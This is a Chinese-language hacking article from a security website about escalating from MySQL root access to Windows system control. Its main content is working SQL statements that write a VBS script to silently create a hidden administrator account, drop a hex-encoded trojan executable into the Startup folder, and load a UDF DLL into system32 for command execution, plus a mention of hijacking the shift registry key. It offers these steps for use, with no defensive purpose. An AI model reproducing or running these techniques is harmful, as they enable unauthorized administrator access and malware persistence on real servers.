频道栏目
首页 > 安全 > 网站安全 > 正文

干掉一切root

2009-12-01 23:44:23           
收藏   我要投稿

作者:FoolishQiang   原文地址:http://hi.baidu.com/foolishqiang/

MYSQL提权我在前面已经写的很明白了,但是还有一些朋友ROOT连接上了,但是无法执行CMD。无论执行什么都返回:

数据库查讯出错,请检查SQL语句create function cmdshell returns string soname udf.dll的语法是否正确。Cant open shared library udf.dll (errno: 0 )

////////////////////////////////////

那么我们在利用服务器组件来进行VBS提权:

///////////////////

构造语句:

/////////////////

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"") " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user foolishqiang foolishqiang /add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators foolishqiang /add"",0) " );


///////////////////////

后面我加了一个参数:0,意思为默默的执行。没有任何回显。0表示不弹出CMD窗口,安静的运行。

////////////////////////////////////

上面的方法一般在加上我以前写的一个MYSQL提权应该能解决提权的问题了。我们也可以以16进制写exe文件

///////////////////////////

create table a (cmd BLOB);

insert into a values (CONVERT(木马的16进制代码,CHAR));

select * from a into dumpfile C:\Documents and Settings\All Users\「开始」菜单\程序启动\foolishqiang.exe

注意:路径一定要写\ 俩个 因为要过滤一个

///////////////////////////////////////////////

应该说root的总结的差不多了 包括了dll提权。已经导vbs提权。exe提权,Linx Mysql BackDoor提权等。

如果还要深入的话。干点root

还有MIX.DLL。

create table temp_mix(abc longblob);
insert into temp_mix values(load_file(D:\udf.dll));       ///////////路径
select * from temp_mix into dumpfile C:\Windows\system32\udf.dll;
create function MyCmd returns string soname udf.dll;
select MyCmd(net user);
drop table if exists temp_mix;

这个一般用的不是很多。

/////////////////

我们也可以构造语句,来劫持注册表shift。而不去替换(有保护)。这样也可以进行提权。

Root的提权方法我基本已经都说了。

小菜愚见,大牛不要见笑

相关TAG标签
上一篇:东方传奇奥思维自助建站软件漏洞
下一篇:McAfee防止挂马-用McAfee阻止IIS写入asp文件
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站